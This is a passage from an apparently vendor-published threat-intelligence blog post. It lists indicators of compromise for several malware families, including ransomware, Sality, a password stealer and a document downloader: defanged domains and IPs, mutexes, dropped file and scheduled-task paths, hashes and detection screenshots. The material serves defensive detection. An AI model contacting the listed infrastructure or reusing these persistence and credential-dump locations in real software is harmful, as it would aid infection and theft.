/><ul><li>p3nlhclust404[.]shr[.]prod[.]phx3[.]secureserver[.]net</li><li>ejercitodemaquinas[.]com</li><li>jsplivenews[.]com</li><li>dealnexus[.]intralinks[.]com</li><li>gvmadvogados[.]com[.]br</li><li>infobox[.]ru</li><li>chstarkeco[.]com</li><li>www[.]infobox[.]ru</li><li>www[.]legal500[.]com</li><li>g-steel[.]ru</li><li>www[.]gvmadvogados[.]com[.]br</li></ul><b>Files and or directories created</b><br /><ul><li>%LocalAppData%\Temp\GmP.exe</li><li>%TEMP%\GmP.exe</li><li>%LocalAppData%\Temp\hu3xyaa3.0rw.ps1</li><li>%LocalAppData%\Temp\mz5ranh3.2bk.psm1</li><li>%LocalAppData%\Temp\CVR2D3B.tmp</li><li>%LocalAppData%\Temp\~DFA8496BB3134EB884.TMP</li><li>%WinDir%\SysWOW64\YC4GWpe1p4Ot.exe</li><li>%SystemDrive%\Documents and Settings\Administrator\Cookies\administrator@gvmadvogados.com[1].txt</li><li>%SystemDrive%\~$4550683.doc</li></ul><b>File Hashes</b><br /><ul><li>0da3104bfc37f64817dbbb0f5fd699c19db913b2a2f5c6f883b0813f1669638a</li><li>1ca11cdd2bafbcd28491f6e46e1a2dfd9c435effb2ac941c7d164114d82d2aec</li><li>21694e71a6d384e5080e422ca98dd16a52c39e430bfdec1732b3706c480914e9</li><li>25fafc8f6d6819add0f2f907d1cf8a760ea0e4256b5a9997ebae705a7f40691e</li><li>434a1520a7608017e839ecd8804d04ef5d53d0b1dfaae1e8865383510cb314ca</li><li>46c708f3468052469785a18c61440521d05eeeb48625122b2f0879924fcf19a2</li><li>4e03038cd03633b18f289487b717e6f9b75315c382794c73943092f6a90d170b</li><li>6007e6c3de3dade995044f661cd8d53a9245ed12c1c56d427bdd3aa267398921</li><li>6311b3f0767a57f8c7ee0c6e317fad84bc9d39a12e48f28505ecddc842a66095</li><li>8286c59c07e75f97219bf649077d3ea44f497e715376fa867fec38fc34917ae8</li><li>9248345ccc78b67a968c1f2082916ee58d0ce5642698a7a6e2f830f65937bc8d</li><li>95696fdc9073bbb5feb71da630fa3c1f2255c3f7025bce4bc2ce7a0bda261bdf</li><li>c060f2d8dc9a46d2805e514584fcdf02e39e2e56110c2ef0f0464e2ae40d3842</li></ul><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-Buwn_soM_es/XAqkjIzrtJI/AAAAAAAABPA/7JRE1oRmuMUKG09WOvrPhuHNY6KyrrGRQCLcBGAs/s1600/6007e6c3de3dade995044f661cd8d53a9245ed12c1c56d427bdd3aa267398921_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://2.bp.blogspot.com/-Buwn_soM_es/XAqkjIzrtJI/AAAAAAAABPA/7JRE1oRmuMUKG09WOvrPhuHNY6KyrrGRQCLcBGAs/s400/6007e6c3de3dade995044f661cd8d53a9245ed12c1c56d427bdd3aa267398921_amp.png" width="400" /></a></div><b><br /></b><br /><b>ThreatGrid</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-AZFJ-e9wZ-8/XAqknEHSfJI/AAAAAAAABPE/rgnu3WsDAi87s6RfHoR050SPLnwzrUNHgCLcBGAs/s1600/6007e6c3de3dade995044f661cd8d53a9245ed12c1c56d427bdd3aa267398921_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="801" data-original-width="962" height="532" src="https://3.bp.blogspot.com/-AZFJ-e9wZ-8/XAqknEHSfJI/AAAAAAAABPE/rgnu3WsDAi87s6RfHoR050SPLnwzrUNHgCLcBGAs/s640/6007e6c3de3dade995044f661cd8d53a9245ed12c1c56d427bdd3aa267398921_tg.png" width="640" /></a></div><b><br /></b><br /><b>Umbrella</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-CJMuXGikSkA/XAqkrMJNtFI/AAAAAAAABPI/NvD7CHCifPoehvgGkIPay2pMcxRROsyogCLcBGAs/s1600/6007e6c3de3dade995044f661cd8d53a9245ed12c1c56d427bdd3aa267398921_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="272" data-original-width="870" height="200" src="https://2.bp.blogspot.com/-CJMuXGikSkA/XAqkrMJNtFI/AAAAAAAABPI/NvD7CHCifPoehvgGkIPay2pMcxRROsyogCLcBGAs/s640/6007e6c3de3dade995044f661cd8d53a9245ed12c1c56d427bdd3aa267398921_umbrella.png" width="640" /></a></div><br /><br /><b>Malware</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-gpDFnu5sDFM/XAqkzsSiWNI/AAAAAAAABPU/9-gPcdXs0iAJtHqmmyy_eNXyVwlThYpSgCLcBGAs/s1600/6007e6c3de3dade995044f661cd8d53a9245ed12c1c56d427bdd3aa267398921_malware.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="480" src="https://4.bp.blogspot.com/-gpDFnu5sDFM/XAqkzsSiWNI/AAAAAAAABPU/9-gPcdXs0iAJtHqmmyy_eNXyVwlThYpSgCLcBGAs/s640/6007e6c3de3dade995044f661cd8d53a9245ed12c1c56d427bdd3aa267398921_malware.png" width="640" /></a></div><b><br /></b><br /><h3>Win.Ransomware.Imps-6765847-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>N/A</li></ul><b>Mutexes</b><br /><ul><li>Global\LOADPERF_MUTEX</li><li>DSKQUOTA_SIDCACHE_MUTEX</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>185[.]9[.]147[.]4</li></ul><b>Domain Names</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>s142814[.]smrtp[.]ru</li></ul><b>Files and or directories created</b><br /><ul><li>%LocalAppData%\Temp\98B68E3C.zip</li><li>%AppData%\Microsoft\Network\srcc.exe</li><li>%AppData%\Microsoft\Windows\audiohq.exe</li><li>%System32%\Tasks\ApplicationUpdateCallback</li><li>%System32%\Tasks\System\Security\upjf</li><li>%System32%\Tasks\System\smartscreen</li></ul><b>File Hashes</b><br /><ul><li>504c6e964c591cd6b4aac5193600058863a5c3c3b9ae7e5756315114fb032a11</li><li>52691c9c33c0b2707d74cca5738a15313ccd5264279a20933886a1f4d60aaea1</li><li>6acf9095e1f5725380bdac7fd7d1d9f07fdb44daa4682c2c8ef001094252d699</li><li>8c84a6d109b529446bb89ae69175f848579699bfc0bcb6dd23a2cdfd31b48f43</li><li>8d19e0e2b8ca2d659ab37a67e094d09b3e208453a2db48fea93840a203f3e7db</li><li>982024167a8bc0e5f6fce2b476655b91c821d09f324f95e77f0d38358d1a881b</li><li>9c2d5ab12e6f67faae5444007b9135834af71cc5e23c53801fa39877b9068101</li><li>9c4780fa358ee65ac1f2361e1e2757f475674145977bfb8a43870538dd6f85ca</li><li>a3786fbfefcdec86bfb9ea1f4d14faa1285dab5bc846ba556b6b9ba3c974c420</li><li>ca7073947e41d18d30565366df2522f12bbeb0d4a856e1572d654a3d569bd3ce</li><li>d2482568a93e5755ff97a8a481e92db8d3f2e4995ee310645f9a1951a9075250</li></ul><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-BAYU0-ifAG4/XAqsRSU9HMI/AAAAAAAABPw/MsHUz4hzAgcPo2TL5XK7ZkKO2Q0g4aDNwCLcBGAs/s1600/8d19e0e2b8ca2d659ab37a67e094d09b3e208453a2db48fea93840a203f3e7db_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://2.bp.blogspot.com/-BAYU0-ifAG4/XAqsRSU9HMI/AAAAAAAABPw/MsHUz4hzAgcPo2TL5XK7ZkKO2Q0g4aDNwCLcBGAs/s400/8d19e0e2b8ca2d659ab37a67e094d09b3e208453a2db48fea93840a203f3e7db_amp.png" width="400" /></a></div><b><br /></b><br /><b>ThreatGrid</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-ryyGWiRxlTs/XAqsVgohW7I/AAAAAAAABP0/h66eV4utudoUTUjkQT05MY8D-WIQk9NgwCLcBGAs/s1600/8d19e0e2b8ca2d659ab37a67e094d09b3e208453a2db48fea93840a203f3e7db_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="801" data-original-width="962" height="532" src="https://3.bp.blogspot.com/-ryyGWiRxlTs/XAqsVgohW7I/AAAAAAAABP0/h66eV4utudoUTUjkQT05MY8D-WIQk9NgwCLcBGAs/s640/8d19e0e2b8ca2d659ab37a67e094d09b3e208453a2db48fea93840a203f3e7db_tg.png" width="640" /></a></div><br /><br /><b>Umbrella</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-BTGjQkKhAn0/XAqscop3JUI/AAAAAAAABP4/PwIomPmFKkAR5bomLd4ac8SFCDZT-u_TQCLcBGAs/s1600/8d19e0e2b8ca2d659ab37a67e094d09b3e208453a2db48fea93840a203f3e7db_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="272" data-original-width="870" height="200" src="https://1.bp.blogspot.com/-BTGjQkKhAn0/XAqscop3JUI/AAAAAAAABP4/PwIomPmFKkAR5bomLd4ac8SFCDZT-u_TQCLcBGAs/s640/8d19e0e2b8ca2d659ab37a67e094d09b3e208453a2db48fea93840a203f3e7db_umbrella.png" width="640" /></a></div><br /><br /><h3>Win.Virus.Sality-6765491-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>&lt;HKLM&gt;\SOFTWARE\WOW6432NODE\Creative Tech </li><li>&lt;HKLM&gt;\SOFTWARE\WOW6432NODE\CREATIVE TECH\Installation </li><li>&lt;HKLM&gt;\SOFTWARE\Creative Tech </li></ul><b>Mutexes</b><br /><ul><li>csrss.exeM_328_</li><li>lsass.exeM_428_</li><li>smss.exeM_204_</li><li>svchost.exeM_840_</li><li>wininit.exeM_320_</li><li>winlogon.exeM_356_</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Domain Names</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Files and or directories created</b><br /><ul><li>%System16%.ini</li><li>%SystemDrive%\autorun.inf</li><li>%System32%\CmdRtr64.DLL</li><li>%WinDir%\Temp\CRF000\APOMgr64.dll</li><li>%WinDir%\Temp\CRF000\APOMngr.dll</li><li>%WinDir%\Temp\CRF000\CmdRtr.dll</li><li>%WinDir%\Temp\CRF000\CmdRtr64.dll</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\bkhxl.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\pelbwv.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\scih.exe</li><li>%WinDir%\Temp\CRF000\creaf_ms.cab</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tlinwq.exe</li><li>%WinDir%\Temp\CRF000\mint.ini</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winbdaue.exe</li><li>%WinDir%\Temp\CRF000\mint32.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winbhys.exe</li><li>%WinDir%\Temp\CRF000\mint64.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winbqckk.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\wincsbehn.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winfudq.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winimau.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winjcsnxu.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winkggnjk.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winkmdt.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\wintyttku.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winvcpbm.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winxraoo.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\xatik.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\xovxjg.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ydgy.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ysrnph.exe</li><li>%System32%\drivers\oiihn.sys</li></ul><b>File Hashes</b><br /><ul><li>055dd786fbb1c16e793f806368aa0f05ab7ef45db767fe5a7a829f11da37da0a</li><li>14f659a71058babb085af0f228c34339da3f124fdd66f63976357d64e69c661f</li><li>1daef9e1a3fe804680acf7e0a64724d4c106fea7aba46d437738b7ab72cff59d</li><li>3b6a5842eeab177d8d869f8eac9aea7342cb1117ac063e4cc2e3c4298107b028</li><li>5d83a8691b914f3971c6b91e8c82803b479ae70756cfbeb987ddb842eb399d8a</li><li>88f585ed82535a991dee6b054caf7efd9f4bb54acdde8fdf7d05eba8997d1058</li><li>973dbe64453445eb82a2e619842f46c8ed3e6ca74533db582b472e79bc01601c</li><li>a28cd979f9395cc482d9de5d7fd676a379e97920a37784763bfb72f348556cdb</li><li>d746b850bf25ef3872d33c3b0067910b8d075a0bed0af89c3c14ecd2efee3fab</li><li>f2864685d01a793c2e76191d3be5278b6e1d59a9fb5b20e7a229e3d634108c8c</li><li>f6c27d2fdfed0a6b67e5aee197388797ef77a4cece21c849ac096d075dbd93c9</li></ul><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-fnKt177UMPI/XAqs3JeXt2I/AAAAAAAABQE/W8-NYIm4uJQZB-5qgr0kEeOj1g2VO0jXgCLcBGAs/s1600/14f659a71058babb085af0f228c34339da3f124fdd66f63976357d64e69c661f_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://1.bp.blogspot.com/-fnKt177UMPI/XAqs3JeXt2I/AAAAAAAABQE/W8-NYIm4uJQZB-5qgr0kEeOj1g2VO0jXgCLcBGAs/s400/14f659a71058babb085af0f228c34339da3f124fdd66f63976357d64e69c661f_amp.png" width="400" /></a></div><br /><br /><b>ThreatGrid</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-jQT4O5kfrqY/XAqs6-lr5RI/AAAAAAAABQI/mPyOwNTzHhEwgYxlB5ko4sBhEe9dcKv_wCLcBGAs/s1600/14f659a71058babb085af0f228c34339da3f124fdd66f63976357d64e69c661f_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="801" data-original-width="962" height="532" src="https://1.bp.blogspot.com/-jQT4O5kfrqY/XAqs6-lr5RI/AAAAAAAABQI/mPyOwNTzHhEwgYxlB5ko4sBhEe9dcKv_wCLcBGAs/s640/14f659a71058babb085af0f228c34339da3f124fdd66f63976357d64e69c661f_tg.png" width="640" /></a></div><b><br /></b><br /><b>Umbrella</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-NCSxdnfOpmw/XAqtA79tJOI/AAAAAAAABQM/fZKYmQ9LpMY-zfFOhRU_wRSw4KZ-rsd9gCLcBGAs/s1600/14f659a71058babb085af0f228c34339da3f124fdd66f63976357d64e69c661f_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="272" data-original-width="870" height="200" src="https://4.bp.blogspot.com/-NCSxdnfOpmw/XAqtA79tJOI/AAAAAAAABQM/fZKYmQ9LpMY-zfFOhRU_wRSw4KZ-rsd9gCLcBGAs/s640/14f659a71058babb085af0f228c34339da3f124fdd66f63976357d64e69c661f_umbrella.png" width="640" /></a></div><b><br /></b><br /><h3>Win.Packed.Passwordstealera-6765350-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>N/A</li></ul><b>Mutexes</b><br /><ul><li>N/A</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>173[.]194[.]175[.]108</li><li>104[.]16[.]17[.]96</li></ul><b>Domain Names</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Files and or directories created</b><br /><ul><li>\??\E:\Sys.exe</li><li>\??\E:\autorun.inf</li><li>%LocalAppData%\Temp\holderwb.txt</li><li>%LocalAppData%\Temp\holdermail.txt</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\dw.log</li><li>%LocalAppData%\Temp\bhvBB7A.tmp</li></ul><b>File Hashes</b><br /><ul><li>02e17144bd22b469828d3a6663ce5ec0c87e24e729322cb97cacbcb4b2949033</li><li>02fc82a18398f81deaee007c20d90e0e3c9722b30d2698f90e796023fc5e1740</li><li>04757c1d814ad34c90bdee0993b86a0b33301abffaee9818310341a950cb9815</li><li>0496858beb4cfd6709dff2122d85e33245ff41ec53831b8fcce61fc5702bef74</li><li>04f66de839722231e20ae25ced41dca0f5e62d1e50b0accca5b65b192d6e4c58</li><li>0526201aa5028da43a2e3d8192c2d62c6953e4f940a631a6365099a22c934200</li><li>055b60ff72bbfc431a15134e7dac00b64a3ba6f53f8041b62d3676e2c0e517fc</li><li>05a3db5d7b308fde9e5763fc960d88463eb1c517a1a645e9cd38229269bf1627</li><li>05e18862ebc7be845735b589227ee2ae63ee66bc7ffb3755c52a8f84495d80db</li><li>06b95f87826fe1272911920412ad972b931c31b1c785fa27ec05c177382da0b6</li><li>06c4d3945b94f611019fc283b93fd63fb3f8405796db59cb5f8222782d0c7ea4</li><li>0826278ce6120f1730ff87aa84ded08db3f6941cc910f46d9f57957ecf699049</li><li>092c6895af99df4b4c094f62e3a92d6d8bf0088844b4b6bbf691bb4f625850d3</li><li>0a46824e179fb9eb61835adb9c9a02919bf41a756f9dbf120cbaed51acf17166</li><li>0a82eb0c8e3d7c2334c4eff82dc394f65654bf72b8ceb6e9d940d90ed3a6ba0a</li><li>0af37d3cb266570cc11f48a4eff5fc4cc4636b7b180801e4cd677bd2d29ce22a</li><li>0b5552c57c06a47fe86276ff15b2695ac2e9dcc6cad5f98f2ba5c43e14932b89</li><li>0cbb8c5cac42acaaf4136770140177fe6261271ec1d035cd433a8b9a97e602d7</li><li>0cff7e9d13a3216254aba643143dd218ca25ec2a503be1516f97a10fed1a151c</li><li>0d07f7c0463a4db0108f63464284c6f278b5ebce3252c8c5172f51e123208d7f</li><li>0e187bb3f6a4c196a92d1ccdcdc0db28861a0be845f0930a9eb308d27489755f</li><li>0e428856132a0fc043f63994abd9cf9fe06975a21f16187d1758af8b73785b1e</li><li>0e4a73fe7c720fa7b00134247ba8aae22ff6cf3cb4edfd994fb599c102462b4b</li><li>0f4682294cea6ff676cc6aa4fbec8fb899bd3bda0b8f73c51e116304a85d5358</li><li>0f5a78e562be95f13a1fd161b81f11f142e560758b48f12b631b83a38645817e</li></ul><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-n4bWutvkUM0/XAqtY_iD6MI/AAAAAAAABQc/bxbMV73bkMkonxjG0obmLMVlkT00ghBUACLcBGAs/s1600/0cbb8c5cac42acaaf4136770140177fe6261271ec1d035cd433a8b9a97e602d7_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://3.bp.blogspot.com/-n4bWutvkUM0/XAqtY_iD6MI/AAAAAAAABQc/bxbMV73bkMkonxjG0obmLMVlkT00ghBUACLcBGAs/s400/0cbb8c5cac42acaaf4136770140177fe6261271ec1d035cd433a8b9a97e602d7_amp.png" width="400" /></a></div><b><br /></b><br /><b>ThreatGrid</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-XkLamHZQkmE/XAqtgeUXR4I/AAAAAAAABQg/sb2ZUH1RjHgyMvxiuc1HQPuy70ABZVQKgCLcBGAs/s1600/0cbb8c5cac42acaaf4136770140177fe6261271ec1d035cd433a8b9a97e602d7_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="801" data-original-width="962" height="532" src="https://2.bp.blogspot.com/-XkLamHZQkmE/XAqtgeUXR4I/AAAAAAAABQg/sb2ZUH1RjHgyMvxiuc1HQPuy70ABZVQKgCLcBGAs/s640/0cbb8c5cac42acaaf4136770140177fe6261271ec1d035cd433a8b9a97e602d7_tg.png" width="640" /></a></div><b><br /></b><br /><h3>Doc.Downloader.Sagent-6766662-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>N/A</li></ul><b>Mutexes</b><br /><ul><li>N/A</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>144[.]217[.]96[.]196</li><li>68[.]66[.]224[.]4</li><li>188[.]40[.]14[.]253</li><li>185[.]45[.]66[.]219</li><li>192[.]185[.]122[.]50</li></ul><b>Domain Names</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>www[.]creativeagency[.]biz</li><li>mandujano[.]net</li><li>biogas-bulgaria[.]efarmbg[.]com</li><li>mahimamedia[.]com</li><li>www[.]brgsabz[.]com</li><li>creativeagency[.]biz</li></ul><b>Files and or directories created</b><br /><ul><li>%LocalAppData%\Temp\zUw.exe</li><li>%LocalAppData%\Temp\dxaf1lgn.ghy.ps1</li><li>%LocalAppData%\Temp\mj5uf2iy.ilx.psm1</li><li>%LocalAppData%\Temp\CVRE3A0.tmp</li><li>%LocalAppData%\Temp\~DF21FCDFAA58A2E1E9.TMP</li><li>\TEMP\~$c0d21bd6c8e28fdebd78dd6505135b6cca400773990a89056de054ed7cbe29.doc</li></ul><b>File Hashes</b><br /><ul><li>0093dcbd8f4bbe4b06e73de6de547ad5993077a113a44c4323a976433246b86b</li><li>0842492265ff119471f0caa69725591341898fde26bf968bbd5471470154cd3b</li><li>201227dd0b8a0fa4b3d9b9cddf1f209c6de1addda9bff6adce66a626838f7e66</li><li>25884a9b024598d9acedc91f15fd6297cba4dc3f704d6a19f626c86e69667e17</li><li>29932262d4afc2f1c90346e826a4df4d56f18bce251fb70993d6d601ffbe51ec</li><li>2e3431ff0a71cbf27d91acbce1e1dc80e4ca59873f451dca029aa0548a732bd3</li><li>30a2e836865ade4af8e8e35726d7187658804ae243ec4a6ef1085d27c2ea18ed</li><li>3204ba3905b38598a69f46de696b2305f5d1052bf0c42d62facd220fdd6f59e1</li><li>3d50876ea89c344ce580f8105d16077c6345a23cf8738668fb0985abf6dcd03b</li><li>3f631a8710b38c08cc4ec7098949908017023ead46db09357c0cfa00e0f88b81</li><li>42a55cc69003e563f10fc82e660da83815e969d1b40018a4687ff024f2745e56</li><li>48c247e5dc712829c5af6a481e0466eb4c92d6ba88bd21bf396a72bd1b2ef22d</li><li>50e0322b2884afb29a5d3d00b59a46ec1328accd770e877b03024eaa81d487b4</li><li>5d4af8e033d5aadba853c0c16d63b672c521a93d5c595c8efde012e3a3a24424</li><li>7d25d591fe5291003a2c43e8d479dfd06ad40c2720a9fc3ffe4b304b97678602</li><li>8bf2b7e3d0b5d4928ba715c5a7060aea26a7c0fe487853135a03bf6d02af581b</li><li>8ca568c68a48c2af33147af88da854129364ae3217832cdae95842101ca031b9</li><li>8d782fc91c991a792498e33dc2db3a2c05f3a3630d6ee0ea5a616e95a67071ca</li><li>8ddc6466bafab540c2efbb2b24492addb9e8987c0fd54676f68d15e23cbe3480</li><li>9a43186e72bde764614b092b55d4dfba00f528c5f0d45e6ccb56dcee8763a845</li><li>9aee7617f88dfffed06e6998a6cfaf8dc1f92dc2ab0164b495a4980fcb9799e1</li><li>a0ad77058d9f583cc7d4127cbeb367e4d714968336157b8ef03e6945c260dc1e</li><li>aeb657063c6507df8da52bc48126c8cfd5d0bd89113d00e4ea1e698f8fb6425f</li><li>b1c0d21bd6c8e28fdebd78dd6505135b6cca400773990a89056de054ed7cbe29</li><li>b66d3770ec1baa5f15c4665d3ca734c4613c0d6bb0e9c167de0a70b1a44f5a41</li></ul><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-1_dHafzEuNY/XAqt81cnuqI/AAAAAAAABQs/YdlC0d0Taq81gZqlGEcgB2qEgmDZdBuLwCLcBGAs/s1600/8bf2b7e3d0b5d4928ba715c5a7060aea26a7c0fe487853135a03bf6d02af581b_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://2.bp.blogspot.com/-1_dHafzEuNY/XAqt81cnuqI/AAAAAAAABQs/YdlC0d0Taq81gZqlGEcgB2qEgmDZdBuLwCLcBGAs/s400/8bf2b7e3d0b5d4928ba715c5a7060aea26a7c0fe487853135a03bf6d02af581b_amp.png" width="400" /></a></div><b><br /></b><br /><b>ThreatGrid</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-SxJyHmqiZc8/XAquDmGWdhI/AAAAAAAABQw/s3cbCjEIdl0q0EVFnLGPfPdFW9g-3KzVACLcBGAs/s1600/b1c0d21bd6c8e28fdebd78dd6505135b6cca400773990a89056de054ed7cbe29_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="801" data-original-width="962" height="532" src="https://1.bp.blogspot.com/-SxJyHmqiZc8/XAquDmGWdhI/AAAAAAAABQw/s3cbCjEIdl0q0EVFnLGPfPdFW9g-3KzVACLcBGAs/s640/b1c0d21bd6c8e28fdebd78dd6505135b6cca400773990a89056de054ed7cbe29_tg.png" width="640" /></a></div><b><br /></b><br /><b>Umbrella</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a 